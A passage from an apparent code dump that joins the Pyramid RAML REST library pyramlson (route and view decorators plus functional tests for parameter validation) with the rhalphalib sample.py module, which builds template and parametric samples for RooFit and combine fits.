self.returns = returns if returns is not None else DEFAULT_METHOD_MAP[self.http_method]
def __call__(self, method):
method._rest_config = MethodRestConfig(
self.http_method,
self.permission,
self.returns
)
return method
class api_service(object):
"""Configures a resource by its REST path.
This decorator configures a class as a REST resource. All endpoints
must be defined in a RAML file.
"""
# pylint: disable=invalid-name
def __init__(self, resource_path, route_name=None):
LOG.debug("Resource path: %s", resource_path)
self.resource_path = resource_path
self.route_name = route_name
self.resources = []
self.apidef = None
self.cls = None
self.module = None
def callback(self, scanner, name, cls):
config = scanner.config.with_package(self.module)
self.apidef = config.registry.queryUtility(IRamlApiDefinition)
self.create_route(config)
LOG.debug("registered routes with base route '%s'", self.apidef.base_path)
self.create_views(config)
def create_route(self, config):
LOG.debug("Creating route for %s", self.resource_path)
supported_methods = []
path = self.resource_path
if self.apidef.base_path:
path = "{}{}".format(self.apidef.base_path, path)
# Find all methods for this resource path
for resource in self.apidef.get_resources(self.resource_path):
if self.route_name is None:
self.route_name = "{}-{}".format(resource.display_name, path)
method = resource.method.upper()
self.resources.append((method, resource, None))
supported_methods.append(method)
# Add one route for all the methods at this resource path
if supported_methods:
LOG.debug("Registering route with path %s", path)
config.add_route(self.route_name, path, factory=self.cls)
# add a default OPTIONS view if none was defined by the resource
opts_meth = 'OPTIONS'
if opts_meth not in supported_methods:
methods = supported_methods + [opts_meth]
self.resources.append((
'OPTIONS',
resource,
create_options_view(methods)
))
def create_views(self, config):
for (method, resource, default_view) in self.resources:
LOG.debug("Creating view %s %s", self.route_name, method)
if default_view:
config.add_view(
default_view,
route_name=self.route_name,
request_method=method
)
else:
(view, permission) = self.create_view(resource)
LOG.debug(
"Registering view %s for route name '%s', resource '%s', method '%s'",
view,
self.route_name,
resource,
method
)
config.add_view(
view,
route_name=self.route_name,
request_method=method,
permission=permission
)
def __call__(self, cls):
self.cls = cls
info = venusian.attach(cls, self.callback, 'pyramid', depth=1)
self.module = info.module
return cls
def create_view(self, resource):
(meth, cfg) = self.get_service_class_method(resource)
LOG.debug("Got method %s for resource %s", meth, resource)
if not meth:
msg = "Could not find a method in class {} suitable for resource {}.".format(
self.cls,
resource
)
raise NoMethodFoundError(msg)
transform = self.apidef.args_transform_cb
transform = transform if callable(transform) else lambda arg: arg
convert = self.apidef.convert_params
def view(context, request):
required_params = [context]
optional_params = dict()
# URI parameters have the highest prio
if resource.uri_params:
for param in resource.uri_params:
param_value = request.matchdict[param.name]
converted = validate_and_convert(param, param_value)
# pyramid router makes sure the URI params are all
# set, otherwise the view isn't called all, because
# a NotFound error is triggered before the request
# can be routed to this view
required_params.append(converted if convert else param_value)
# If there's a body defined - include it before traits or query params
if resource.body:
if resource.body[0].mime_type == "application/json":
required_params.append(prepare_json_body(request, resource.body))
else:
required_params.append(request.body)
if resource.query_params:
for param in resource.query_params:
# query params are always named (i.e. not positional)
# so they effectively become keyword agruments in a
# method call, we just make sure they are present
# in the request if marked as 'required'
if param.required and param.name not in request.params:
raise HTTPBadRequest("{} ({}) is required".format(param.name, param.type))
param_value = request.params.get(param.name, MARKER)
absent = param_value is MARKER
# If there's no default value defined in RAML let the decorated
# method decide which defaults to use. Unfortunatelly there is
# no way to tell whether a default value was declared as 'null'
# in RAML or if it was omitted - it's None in both cases
if absent and param.default is None:
continue
if not absent:
if convert:
param_value = validate_and_convert(param, param_value)
else:
if convert:
param_value = validate_and_convert(param, param.default)
else:
param_value = param.default
optional_params[transform(param.name)] = param_value
result = meth(*required_params, **optional_params)
# check if a response type is specified
for response in resource.responses:
if response.code == cfg.returns and len(response.body) == 1:
body = response.body[0]
if body.mime_type == 'application/json':
break
response_mime_type = body.mime_type
return render_mime_view(result, cfg.returns, mime_type=response_mime_type)
return render_view(request, result, cfg.returns)
return (view, cfg.permission)
def get_service_class_method(self, resource):
rel_path = resource.path[len(self.resource_path):]
LOG.debug("Relative path for %s: '%s'", resource, rel_path)
http_method = resource.method.lower()
for (_, member) in getmembers(self.cls):
if not hasattr(member, '_rest_config'):
continue
cfg = member._rest_config # pylint: disable=protected-access
if (cfg.http_method.lower() == http_method) and callable(member):
return (member, cfg)
return (None, None)
def create_options_view(supported_methods):
""" Create a view callable for the OPTIONS request """
def view(context, request): # pylint: disable=unused-argument,missing-docstring
response = HTTPNoContent()
response.headers['Access-Control-Allow-Methods'] =\
', '.join(supported_methods)
return response
return view
def includeme(config):
"""Configure basic RAML REST settings for a Pyramid application.
You should not call this function directly, but use
:py:func:`pyramid.config.Configurator.include` to initialise
the RAML routing.
.. code-block:: python
:linenos:
config = Configurator()
config.include('pyramlson')
"""
from pyramlson.apidef import RamlApiDefinition
settings = config.registry.settings
settings['pyramlson.debug'] = \
settings.get('debug_all') or \
settings.get('pyramid.debug_all') or \
settings.get('pyramlson.debug')
config.add_view('pyramlson.error.generic', context=Exception, renderer='json')
config.add_view('pyramlson.error.http_error', context=IExceptionResponse, renderer='json')
config.add_notfound_view('pyramlson.error.notfound', renderer='json')
config.add_forbidden_view('pyramlson.error.forbidden', renderer='json')
if 'pyramlson.apidef_path' not in settings:
raise ValueError("Cannot create RamlApiDefinition without a RAML file.")
args_transform_cb = None
if 'pyramlson.arguments_transformation_callback' in settings:
args_transform_cb = DottedNameResolver().maybe_resolve(
settings['pyramlson.arguments_transformation_callback']
)
convert_params = False
if 'pyramlson.convert_parameters' in settings:
convert_params = asbool(settings['pyramlson.convert_parameters'])
res = AssetResolver()
apidef_path = res.resolve(settings['pyramlson.apidef_path'])
apidef = RamlApiDefinition(
apidef_path.abspath(),
args_transform_cb=args_transform_cb,
convert_params=convert_params
)
config.registry.registerUtility(apidef, IRamlApiDefinition)
```
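A hedged sketch of declaring a pyramlson service with the two decorators defined above; the RAML file referenced by `pyramlson.apidef_path` is assumed to define the `/books` endpoints, and the method bodies are placeholders:
```python
from pyramid.config import Configurator
from pyramlson import api_service, api_method

@api_service('/books')
class BookResource(object):
    def __init__(self, request):
        self.request = request

    @api_method('get')
    def list_books(self):
        return [{'id': 1, 'title': 'Example'}]

    @api_method('post', returns=201)
    def create_book(self, body):
        # `body` is the parsed JSON request body declared in the RAML file
        return {'success': True}

def make_app(settings):
    # settings must contain 'pyramlson.apidef_path' pointing at the RAML file
    config = Configurator(settings=settings)
    config.include('pyramlson')
    config.scan()
    return config.make_wsgi_app()
```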
#### File: pyramlson/tests/bad_resource.py
```python
from pyramlson import api_service, api_method
@api_service('/books')
class BadResource(object):
def __init__(self, request):
self.request = request
```
#### File: pyramlson/tests/test_resource.py
```python
import os
import unittest
import inflection
from email.utils import parsedate
from datetime import datetime
from pyramid import testing
from six import text_type
from pyramid.config import Configurator
from .base import DATA_DIR
from .resource import BOOKS
from pyramlson import NoMethodFoundError
class ResourceFunctionalTests(unittest.TestCase):
def setUp(self):
settings = {
'pyramlson.apidef_path': os.path.join(DATA_DIR, 'test-api.raml'),
'pyramlson.debug': 'true',
'pyramlson.arguments_transformation_callback': inflection.underscore,
'pyramlson.convert_parameters': 'false'
}
self.config = testing.setUp(settings=settings)
self.config.include('pyramlson')
self.config.scan('.resource')
from webtest import TestApp
self.testapp = TestApp(self.config.make_wsgi_app())
def tearDown(self):
testing.tearDown()
def test_get_list_json(self):
r = self.testapp.get('/api/v1/books', status=200)
assert r.json_body == list(BOOKS.values())
def test_get_one(self):
app = self.testapp
r = app.get('/api/v1/books/123', status=200)
assert r.json_body == BOOKS[123]
r = app.get('/api/v1/books/456', status=200)
assert r.json_body == BOOKS[456]
def test_get_notfound(self):
app = self.testapp
r = app.get('/api/v1/books/111', status=404)
assert r.json_body['success'] == False
assert r.json_body['message'] == "Book with id 111 could not be found."
book_id = 10
fake_book = {'id': book_id, 'title': 'Foo', 'author': 'Blah'}
r = app.put_json('/api/v1/books/{}'.format(book_id), params=fake_book, status=404)
assert r.json_body['success'] == False
assert r.json_body['message'] == "Book with id {} could not be found.".format(book_id)
def test_get_general_error(self):
app = self.testapp
r = app.get('/api/v1/books/zzz', status=400)
assert r.json_body['success'] == False
assert "Malformed parameter 'bookId'" in r.json_body['message']
def test_json_validation_error(self):
app = self.testapp
r = app.put('/api/v1/books/111', status=400)
assert r.json_body['message'] == "Empty body!"
assert r.json_body['success'] == False
r = app.request('/api/v1/books/111',
method='PUT',
body=b'{',
status=400,
content_type='application/json')
assert r.json_body['success'] == False
assert str(r.json_body['message']).startswith("Invalid JSON body:")
book_id = 10
fake_book = {'author': 'Blah'}
r = app.put_json('/api/v1/books/{}'.format(book_id), params=fake_book, status=400)
assert r.json_body['success'] == False
assert 'Failed validating' in r.json_body['message']
def test_not_accepted_body_mime_type(self):
app = self.testapp
r = app.request('/api/v1/books/123',
method='PUT',
body=b'hi there',
status=400,
content_type='text/plain')
assert r.json_body['success'] == False
assert "Invalid JSON body:" in r.json_body['message']
def test_succesful_json_put(self):
app = self.testapp
book_id = 123
fake_book = {'id': book_id, 'title': 'Foo', 'author': 'Blah'}
r = app.put_json('/api/v1/books/{}'.format(book_id), params=fake_book, status=200)
assert r.json_body['success'] == True
def test_default_options(self):
app = self.testapp
r = app.options('/api/v1/books', status=204)
header = r.headers['Access-Control-Allow-Methods'].split(', ')
assert 'POST' in header
assert 'GET' in header
assert 'OPTIONS' in header
def test_required_uriparams(self):
app = self.testapp
tt = 'a'
r = app.get('/api/v1/books/some/other/things', params=dict(thingType=tt), status=200)
# note the renamed argument
assert r.json_body['thing_type'] == tt
def test_missing_required_uriparams(self):
app = self.testapp
tt = 'a'
r = app.get('/api/v1/books/some/other/things', params=dict(foo='bar'), status=400)
assert r.json_body['message'] == 'thingType (string) is required'
def test_post_file(self):
file_id = 'foo'
file_content = b'foobar'
uri = '/api/v1/files/{}'.format(file_id)
r = self.testapp.post(
uri,
file_content,
content_type='application/octet-stream',
status=201
)
r2 = self.testapp.get('/api/v1/files/{}'.format(file_id), status=200)
assert r2.body == file_content
class NoMatchingResourceMethodTests(unittest.TestCase):
def setUp(self):
settings = {
'pyramlson.apidef_path': os.path.join(DATA_DIR, 'test-api.raml'),
}
self.config = testing.setUp(settings=settings)
def test_valueerror(self):
self.config.include('pyramlson')
self.assertRaises(NoMethodFoundError, self.config.scan, '.bad_resource')
def datetime_adapter(obj, request):
return obj.isoformat()
class ParamsConverterTests(unittest.TestCase):
def setUp(self):
from pyramid.renderers import JSON
json_renderer = JSON()
settings = {
'pyramlson.apidef_path': os.path.join(DATA_DIR, 'test-api.raml'),
'pyramlson.debug': 'true',
'pyramlson.arguments_transformation_callback': inflection.underscore,
'pyramlson.convert_parameters': 'true'
}
self.config = testing.setUp(settings=settings)
self.config.include('pyramlson')
json_renderer.add_adapter(datetime, datetime_adapter)
self.config.add_renderer('json', json_renderer)
self.config.scan('.resource')
from webtest import TestApp
self.testapp = TestApp(self.config.make_wsgi_app())
def test_param_type_conversion(self):
date_str = 'Sun, 06 Nov 1994 08:49:37 GMT'
date = datetime(*parsedate(date_str)[:6])
params = {
'maxString': 'zzz',
'minString': 'tt',
'choiceString': 'bar',
'patternString': 'ABCD54321',
'someNumber': '7',
'minMaxNumber': '0.8',
'minMaxInteger': '20',
'someBool': 'true',
'someDate': date_str
}
r = self.testapp.get('/api/v1/parametrized', params=params)
b = r.json_body
assert type(b['max_string']) is text_type
assert type(b['min_string']) is text_type
assert type(b['choice_string']) is text_type
assert type(b['pattern_string']) is text_type
assert type(b['some_number']) is int
assert type(b['min_max_number']) is float
assert type(b['min_max_integer']) is int
assert type(b['some_bool']) is bool
assert b['some_date'] == datetime_adapter(date, None)
def test_string_param_validation(self):
params = {
'maxString': 'z' * 20,
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert "Malformed parameter 'maxString'" in r.json_body['message']
assert "expected maximum length is 10, got 20" in r.json_body['message']
params = {
'minString': 'z'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'minString', expected minimum length is 2, got 1"
params = {
'choiceString': 'biteme'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'choiceString', expected one of foo, bar, blah, got 'biteme'"
params = {
'patternString': 'biteme'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'patternString', expected pattern ^[A-Z]{4}[0-9]*$, got 'biteme'"
def test_number_param_validation(self):
params = {
'someNumber': 'Rasdf'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'someNumber', expected a syntactically valid number, got 'Rasdf'"
params = {
'minMaxNumber': '-400.456'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Parameter 'minMaxNumber' is too small, expected at least -10, got -400.456"
params = {
'minMaxNumber': '800.800'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Parameter 'minMaxNumber' is too large, expected at most 100.55, got 800.8"
def test_integer_param_validation(self):
params = {
'minMaxInteger': '4.08'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Malformed parameter 'minMaxInteger', expected a syntactically valid integer, got '4.08'"
params = {
'minMaxInteger': '0'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Parameter 'minMaxInteger' is too small, expected at least 7, got 0"
params = {
'minMaxInteger': '100'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert r.json_body['message'] == \
"Parameter 'minMaxInteger' is too large, expected at most 42, got 100"
def test_bool_param_validation(self):
params = {
'someBool': 'yes'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert "Malformed boolean parameter 'someBool'" in r.json_body['message']
assert "expected 'true' or 'false', got 'yes'" in r.json_body['message']
def test_date_param_validation(self):
params = {
'someDate': '2016-1-11'
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert "Malformed parameter 'someDate'" in r.json_body['message']
assert "expected RFC 2616 formatted date, got 2016-1-11" in r.json_body['message']
date_str = 'Sun, 06 Nov 1000 53:78:37'
params = {
'someDate': date_str
}
r = self.testapp.get('/api/v1/parametrized', params=params, status=400)
assert "Malformed parameter 'someDate':" in r.json_body['message']
assert "hour must be in 0..23" in r.json_body['message']
def test_missing_default_in_raml(self):
r = self.testapp.get('/api/v1/parametrized', status=200)
assert "defined in method!" == r.json_body['missing_default']
```
|
{
"source": "jennetd/rhalphalib",
"score": 2
}
|
#### File: rhalphalib/rhalphalib/sample.py
```python
from __future__ import division
import numpy as np
import numbers
import warnings
from .parameter import (
Parameter,
IndependentParameter,
NuisanceParameter,
DependentParameter,
SmoothStep,
Observable,
)
from .util import _to_numpy, _to_TH1, _pairwise_sum, install_roofit_helpers
class Sample(object):
"""
Sample base class
"""
SIGNAL, BACKGROUND = range(2)
def __init__(self, name, sampletype):
self._name = name
self._sampletype = sampletype
self._observable = None
self._mask = None
def __repr__(self):
return "<%s (%s) instance at 0x%x>" % (
self.__class__.__name__,
self._name,
id(self),
)
@property
def name(self):
return self._name
@property
def sampletype(self):
return self._sampletype
@property
def observable(self):
if self._observable is None:
raise RuntimeError("A Sample was not constructed correctly")
return self._observable
@observable.setter
def observable(self, obs):
# TODO check compatible?
self._observable = obs
@property
def parameters(self):
raise NotImplementedError
@property
def mask(self):
'''
An array matching the observable binning that specifies which bins to populate
i.e. when mask[i] is False, the bin content will be set to 0.
'''
return self._mask
@mask.setter
def mask(self, mask):
if isinstance(mask, np.ndarray):
mask = mask.astype(bool)
if self.observable.nbins != len(mask):
raise ValueError("Mask shape does not match number of bins in observable")
# protect from mutation
mask.setflags(write=False)
elif mask is not None:
raise ValueError("Mask should be None or a numpy array")
self._mask = mask
def setParamEffect(self, param, effect_up, effect_down=None):
raise NotImplementedError
def getParamEffect(self, param, up=True):
raise NotImplementedError
def getExpectation(self, nominal=False):
raise NotImplementedError
def renderRoofit(self, workspace):
raise NotImplementedError
def combineNormalization(self):
raise NotImplementedError
def combineParamEffect(self, param):
raise NotImplementedError
class TemplateSample(Sample):
def __init__(self, name, sampletype, template):
'''
name: self-explanatory
sampletype: Sample.SIGNAL or BACKGROUND or DATA
template: Either a ROOT TH1, a 1D Coffea Hist object, or a numpy histogram
in the latter case, please extend the numpy histogram tuple to define an observable name
i.e. (sumw, binning, name)
(for the others, the observable name is taken from the x axis name)
'''
super(TemplateSample, self).__init__(name, sampletype)
sumw2 = None
try:
sumw, binning, obs_name, sumw2 = _to_numpy(template, read_sumw2=True)
except ValueError:
sumw, binning, obs_name = _to_numpy(template)
observable = Observable(obs_name, binning)
self._observable = observable
self._nominal = sumw
self._sumw2 = sumw2
self._paramEffectsUp = {}
self._paramEffectsDown = {}
self._paramEffectScales = {}
self._extra_dependencies = set()
def show(self):
print(self._nominal)
if self._sumw2 is not None:
print(self._sumw2)
def scale(self, _scale):
self._nominal *= _scale
if self._sumw2 is not None:
self._sumw2 *= _scale*_scale
@property
def parameters(self):
'''
Set of independent parameters that affect this sample
'''
pset = set(self._paramEffectsUp.keys())
pset.update(self._extra_dependencies)
return pset
def setParamEffect(self, param, effect_up, effect_down=None, scale=None):
'''
Set the effect of a parameter on a sample (e.g. the size of unc. or multiplier for shape unc.)
param: a Parameter object
effect_up: a numpy array representing the relative (multiplicative) effect of the parameter on the bin yields,
or a single number representing the relative effect on the sample normalization,
or a histogram representing the *bin yield* under the effect of the parameter (i.e. not relative)
or a DependentParameter representing the value to scale the *normalization* of this process
effect_down: if asymmetric effects, fill this in, otherwise the effect_up value will be symmetrized
scale : number, optional
ad-hoc rescaling of the effect, most useful for shape effects where the nuisance parameter effect needs to be
magnified to ensure good vertical interpolation
N.B. the parameter must have a compatible combinePrior, i.e. if param.combinePrior is 'shape', then one must pass a numpy array
'''
if not isinstance(param, NuisanceParameter):
if isinstance(param, IndependentParameter) and isinstance(effect_up, DependentParameter):
extras = effect_up.getDependents() - {param}
if not all(isinstance(p, IndependentParameter) for p in extras):
raise ValueError("Normalization effects can only depend on one or more IndependentParameters")
self._extra_dependencies.update(extras)
for extra in extras:
self._paramEffectsUp[extra] = None
if effect_down is not None:
raise ValueError("Asymmetric normalization modifiers not supported. You can encode the effect in the dependent parameter")
effect_up.name = param.name + '_effect_' + self.name
self._paramEffectsUp[param] = effect_up
return
else:
raise ValueError("Template morphing can only be done via a NuisanceParameter or IndependentParameter")
if isinstance(effect_up, np.ndarray):
if len(effect_up) != self.observable.nbins:
raise ValueError("effect_up has the wrong number of bins (%d, expected %d)" % (len(effect_up), self.observable.nbins))
elif isinstance(effect_up, numbers.Number):
if 'shape' in param.combinePrior:
effect_up = np.full(self.observable.nbins, effect_up)
else:
effect_up, binning, _ = _to_numpy(effect_up)
if not np.array_equal(binning, self.observable.binning):
raise ValueError("effect_up has incompatible binning with sample %r" % self)
zerobins = self._nominal <= 0.
effect_up[zerobins] = 1.
effect_up[~zerobins] /= self._nominal[~zerobins]
if np.sum(effect_up * self._nominal) == 0:
# TODO: warning? this can happen regularly
# we might even want some sort of threshold
return
elif np.all(effect_up == 1.):
# some sort of threshold might be useful here as well
return
self._paramEffectsUp[param] = effect_up
if effect_down is not None:
if isinstance(effect_down, np.ndarray):
if len(effect_down) != self.observable.nbins:
raise ValueError("effect_down has the wrong number of bins (%d, expected %d)" % (len(effect_down), self.observable.nbins))
elif isinstance(effect_down, numbers.Number):
if 'shape' in param.combinePrior:
effect_down = np.full(self.observable.nbins, effect_down)
else:
effect_down, binning, _ = _to_numpy(effect_down)
if not np.array_equal(binning, self.observable.binning):
raise ValueError("effect_down has incompatible binning with sample %r" % self)
zerobins = self._nominal <= 0.
effect_down[zerobins] = 1.
effect_down[~zerobins] /= self._nominal[~zerobins]
if np.sum(effect_down * self._nominal) == 0:
# TODO: warning? this can happen regularly
# we might even want some sort of threshold
return
elif np.all(effect_down == 1.):
# some sort of threshold might be useful here as well
return
self._paramEffectsDown[param] = effect_down
else:
self._paramEffectsDown[param] = None
if isinstance(scale, numbers.Number):
if isinstance(effect_up, DependentParameter):
raise ValueError("Scale not supported for DependentParameter effects. You can encode the effect in the dependent parameter")
self._paramEffectScales[param] = scale
elif scale is not None:
raise ValueError("Cannot understand scale value %r. It should be a number" % scale)
def getParamEffect(self, param, up=True):
'''
Get the parameter effect
'''
if up:
return self._paramEffectsUp[param]
else:
if param not in self._paramEffectsDown or self._paramEffectsDown[param] is None:
                # TODO the symmetrized value depends on if param prior is 'shapeN' or 'shape'
return 1. / self._paramEffectsUp[param]
return self._paramEffectsDown[param]
def autoMCStats(self):
        ''' Set MC statistical uncertainties based on self._sumw2
'''
if self._sumw2 is None:
raise ValueError("No self._sumw2 defined in template")
for i in range(self.observable.nbins):
if self._nominal[i] <= 0. or self._sumw2[i] <= 0.:
continue
effect_up = np.ones_like(self._nominal)
effect_down = np.ones_like(self._nominal)
effect_up[i] = (self._nominal[i] + np.sqrt(self._sumw2[i]))/self._nominal[i]
effect_down[i] = max((self._nominal[i] - np.sqrt(self._sumw2[i]))/self._nominal[i], 0.)
param = NuisanceParameter(self.name + '_mcstat_bin%i' % i, combinePrior='shape')
self.setParamEffect(param, effect_up, effect_down)
def getExpectation(self, nominal=False):
'''
Create an array of per-bin expectations, accounting for all nuisance parameter effects
nominal: if True, calculate the nominal expectation (i.e. just plain numbers)
'''
nominalval = self._nominal.copy()
if self.mask is not None:
nominalval[~self.mask] = 0.
if nominal:
return nominalval
else:
out = np.array([IndependentParameter(self.name + "_bin%d_nominal" % i, v, constant=True) for i, v in enumerate(nominalval)])
for param in self.parameters:
effect_up = self.getParamEffect(param, up=True)
if effect_up is None:
continue
if param in self._paramEffectScales:
param_scaled = param * self._paramEffectScales[param]
else:
param_scaled = param
if isinstance(effect_up, DependentParameter):
out = out * effect_up
elif self._paramEffectsDown[param] is None:
if param.combinePrior == 'shape':
out = out * (1 + (effect_up - 1)*param_scaled)
elif param.combinePrior == 'shapeN':
out = out * (effect_up**param_scaled)
elif param.combinePrior == 'lnN':
# TODO: ensure scalar effect
out = out * (effect_up**param_scaled)
else:
raise NotImplementedError('per-bin effects for other nuisance parameter types')
else:
effect_down = self.getParamEffect(param, up=False)
smoothStep = SmoothStep(param_scaled)
if param.combinePrior == 'shape':
combined_effect = smoothStep * (1 + (effect_up - 1)*param_scaled) + (1 - smoothStep) * (1 - (effect_down - 1)*param_scaled)
elif param.combinePrior == 'shapeN':
combined_effect = smoothStep * (effect_up**param_scaled) + (1 - smoothStep) / (effect_down**param_scaled)
elif param.combinePrior == 'lnN':
# TODO: ensure scalar effect
combined_effect = smoothStep * (effect_up**param_scaled) + (1 - smoothStep) / (effect_down**param_scaled)
else:
raise NotImplementedError('per-bin effects for other nuisance parameter types')
out = out * combined_effect
return out
def renderRoofit(self, workspace):
'''
Import the necessary Roofit objects into the workspace for this sample
        and return an extended pdf representing this sample's prediction for pdf and norm.
'''
import ROOT
install_roofit_helpers()
normName = self.name + '_norm'
rooShape = workspace.pdf(self.name)
rooNorm = workspace.function(normName)
if rooShape == None and rooNorm == None: # noqa: E711
rooObservable = self.observable.renderRoofit(workspace)
nominal = self.getExpectation(nominal=True)
rooTemplate = ROOT.RooDataHist(self.name, self.name, ROOT.RooArgList(rooObservable), _to_TH1(nominal, self.observable.binning, self.observable.name))
workspace.add(rooTemplate)
for param in self.parameters:
effect_up = self.getParamEffect(param, up=True)
if 'shape' not in param.combinePrior:
# Normalization systematics can just go into combine datacards (although if we build PDF here, will need it)
if isinstance(effect_up, DependentParameter):
# this is a rateParam, we should add the IndependentParameter to the workspace
param.renderRoofit(workspace)
continue
name = self.name + '_' + param.name + 'Up'
shape = nominal * effect_up
rooTemplate = ROOT.RooDataHist(name, name, ROOT.RooArgList(rooObservable), _to_TH1(shape, self.observable.binning, self.observable.name))
workspace.add(rooTemplate)
name = self.name + '_' + param.name + 'Down'
shape = nominal * self.getParamEffect(param, up=False)
rooTemplate = ROOT.RooDataHist(name, name, ROOT.RooArgList(rooObservable), _to_TH1(shape, self.observable.binning, self.observable.name))
workspace.add(rooTemplate)
rooShape = ROOT.RooHistPdf(self.name, self.name, ROOT.RooArgSet(rooObservable), workspace.data(self.name))
workspace.add(rooShape)
rooNorm = IndependentParameter(normName, nominal.sum(), constant=True).renderRoofit(workspace)
# TODO build the pdf with systematics
elif rooShape == None or rooNorm == None: # noqa: E711
raise RuntimeError('Sample %r has either a shape or norm already embedded in workspace %r' % (self, workspace))
rooShape = workspace.pdf(self.name)
rooNorm = workspace.function(self.name + '_norm')
return rooShape, rooNorm
def combineNormalization(self):
return self.getExpectation(nominal=True).sum()
def combineParamEffect(self, param):
'''
A formatted string for placement into the combine datacard that represents
the effect of a parameter on a sample (e.g. the size of unc. or multiplier for shape unc.)
'''
if self._paramEffectsUp.get(param, None) is None:
return '-'
elif 'shape' in param.combinePrior:
return '%.3f' % self._paramEffectScales.get(param, 1)
elif isinstance(self.getParamEffect(param, up=True), DependentParameter):
# about here's where I start to feel painted into a corner
dep = self.getParamEffect(param, up=True)
channel, sample = self.name[:self.name.find('_')], self.name[self.name.find('_') + 1:]
dependents = dep.getDependents()
formula = dep.formula(rendering=True).format(**{var.name: '@%d' % i for i, var in enumerate(dependents)})
return '{0} rateParam {1} {2} {3} {4}'.format(dep.name,
channel,
sample,
formula,
",".join(p.name for p in dependents),
)
else:
# TODO the scaling here depends on the prior of the nuisance parameter
scale = self._paramEffectScales.get(param, 1.)
up = (self.getParamEffect(param, up=True) - 1) * scale + 1
down = (self.getParamEffect(param, up=False) - 1) * scale + 1
if isinstance(up, np.ndarray):
                # Convert shape to norm (note symmetrized effect on shape != symmetrized effect on norm)
nominal = self.getExpectation(nominal=True)
if nominal.sum() == 0:
up = 1.
down = None
else:
up = (up * nominal).sum() / nominal.sum()
down = (down * nominal).sum() / nominal.sum()
elif self._paramEffectsDown[param] is None:
                # Here we can safely defer to combine to calculate symmetrized effect
down = None
if down is None:
return '%.3f' % up
else:
return '%.3f/%.3f' % (up, down)
class ParametericSample(Sample):
PreferRooParametricHist = True
def __init__(self, name, sampletype, observable, params):
'''
Create a sample that is a binned function, where each bin yield
        is given by the corresponding parameter in ``params``. The list ``params`` should have the
same number of bins as observable.
'''
super(ParametericSample, self).__init__(name, sampletype)
if not isinstance(observable, Observable):
raise ValueError
if len(params) != observable.nbins:
raise ValueError
self._observable = observable
self._nominal = np.array(params)
if not all(isinstance(p, Parameter) for p in self._nominal):
raise ValueError("ParametericSample expects parameters to derive from Parameter type.")
self._paramEffectsUp = {}
self._paramEffectsDown = {}
@property
def parameters(self):
'''
Set of independent parameters that affect this sample
'''
pset = set()
for p in self.getExpectation():
pset.update(p.getDependents(deep=True))
return pset
def setParamEffect(self, param, effect_up, effect_down=None):
'''
Set the effect of a parameter on a sample (e.g. the size of unc. or multiplier for shape unc.)
param: a Parameter object
effect_up: a numpy array representing the relative (multiplicative) effect of the parameter on the bin yields,
or a single number representing the relative effect on the sample normalization,
effect_down: if asymmetric effects, fill this in, otherwise the effect_up value will be symmetrized
N.B. the parameter must have a compatible combinePrior, i.e. if param.combinePrior is 'shape', then one must pass a numpy array
'''
if not isinstance(param, NuisanceParameter):
raise ValueError("Template morphing can only be done via a NuisanceParameter")
if isinstance(effect_up, np.ndarray):
if len(effect_up) != self.observable.nbins:
raise ValueError("effect_up has the wrong number of bins (%d, expected %d)" % (len(effect_up), self.observable.nbins))
elif isinstance(effect_up, numbers.Number):
if 'shape' in param.combinePrior:
effect_up = np.full(self.observable.nbins, effect_up)
else:
raise ValueError("unrecognized effect_up type")
self._paramEffectsUp[param] = effect_up
if effect_down is not None:
if isinstance(effect_down, np.ndarray):
if len(effect_down) != self.observable.nbins:
raise ValueError("effect_down has the wrong number of bins (%d, expected %d)" % (len(effect_down), self.observable.nbins))
elif isinstance(effect_down, numbers.Number):
if 'shape' in param.combinePrior:
effect_down = np.full(self.observable.nbins, effect_down)
else:
raise ValueError("unrecognized effect_down type")
self._paramEffectsDown[param] = effect_down
else:
self._paramEffectsDown[param] = None
def getParamEffect(self, param, up=True):
'''
Get the parameter effect
'''
if up:
return self._paramEffectsUp[param]
else:
if self._paramEffectsDown[param] is None:
                # TODO the symmetrized value depends on if param prior is 'shapeN' or 'shape'
return 1. / self._paramEffectsUp[param]
return self._paramEffectsDown[param]
def getExpectation(self, nominal=False):
'''
Create an array of per-bin expectations, accounting for all nuisance parameter effects
nominal: if True, calculate the nominal expectation (i.e. just plain numbers)
'''
out = self._nominal.copy() # this is a shallow copy
if self.mask is not None:
out[~self.mask] = [IndependentParameter("masked", 0, constant=True) for _ in range((~self.mask).sum())]
if nominal:
return np.array([p.value for p in out])
else:
for param in self._paramEffectsUp.keys():
effect_up = self.getParamEffect(param, up=True)
if effect_up is None:
                    continue
if self._paramEffectsDown[param] is None:
out = out * (effect_up**param)
else:
effect_down = self.getParamEffect(param, up=False)
smoothStep = SmoothStep(param)
combined_effect = smoothStep * (effect_up**param) + (1 - smoothStep) * (effect_down**param)
out = out * combined_effect
for i, p in enumerate(out):
p.name = self.name + '_bin%d' % i
if isinstance(p, DependentParameter):
# Let's make sure to render these
p.intermediate = False
return out
def renderRoofit(self, workspace):
'''
Produce a RooParametricHist (if available) or RooParametricStepFunction and add to workspace
Note: for RooParametricStepFunction, bin values cannot be zero due to this ridiculous line:
https://github.com/root-project/root/blob/master/roofit/roofit/src/RooParametricStepFunction.cxx#L212-L213
'''
import ROOT
install_roofit_helpers()
rooShape = workspace.pdf(self.name)
rooNorm = workspace.function(self.name + '_norm')
if rooShape == None and rooNorm == None: # noqa: E711
rooObservable = self.observable.renderRoofit(workspace)
params = self.getExpectation()
if hasattr(ROOT, 'RooParametricHist') and self.PreferRooParametricHist:
rooParams = [p.renderRoofit(workspace) for p in params]
